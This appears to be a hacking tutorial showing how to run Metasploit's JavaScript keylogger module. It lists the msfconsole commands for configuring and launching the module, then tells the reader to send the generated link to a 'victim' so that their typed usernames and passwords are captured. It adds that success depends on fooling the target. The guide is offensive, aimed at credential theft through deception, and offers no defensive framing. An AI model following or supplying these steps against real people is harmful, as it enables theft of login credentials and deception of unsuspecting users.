Hacking With Java Script Keylogger In Metaspolit

Hey awl in diz tut i will tell you awl how to use Java Script Keylogger in Metaspolit.

Features Of Java Script Keylogger

This module runs a web server that demonstrates keystroke logging through JavaScript. The DEMO option can be set to enable a page that demonstrates this technique. Future improvements will allow for a configurable template to be used with this module. To use this module with an existing web page, simply add a script source tag pointing to the URL of this service ending in the .js extension. For example, if URIPATH is set to "test", the following URL will load this script into the calling site: http://server:port/test/anything.js.

Ok so here we go

Open backtrack terminal type

Now search keylogger. Now you should be able to see the module.

Now type use auxiliary/server/capture/http_javascript_keylogger

Msf exploit (http_javascript_keylogger)>set demo true

Msf exploit (http_javascript_keylogger)>set lhost 192.168.213.128 (IP of Local Host)

Msf exploit (http_javascript_keylogger)>set srvhost 192.168.213.128 (This must be an address on the local machine)

Msf exploit (http_javascript_keylogger)>set uripath keylogger (The Url to use for this exploit)

Msf exploit (http_javascript_keylogger)>exploit 

Now send the URL to the victim and add demo at the end of the URL
http://192.168.213.128:8080/ZQVzH0wo89m6zmg/demo

Now as soon as the victim clicks on dt link  it will show something like shown in below screenshot.

As the victims types anything on username and password field that will be stroked and will be shown to you something like in below screenshot

Its quite difficult to make anyone fool through this trick but it depends upon your way of making fool.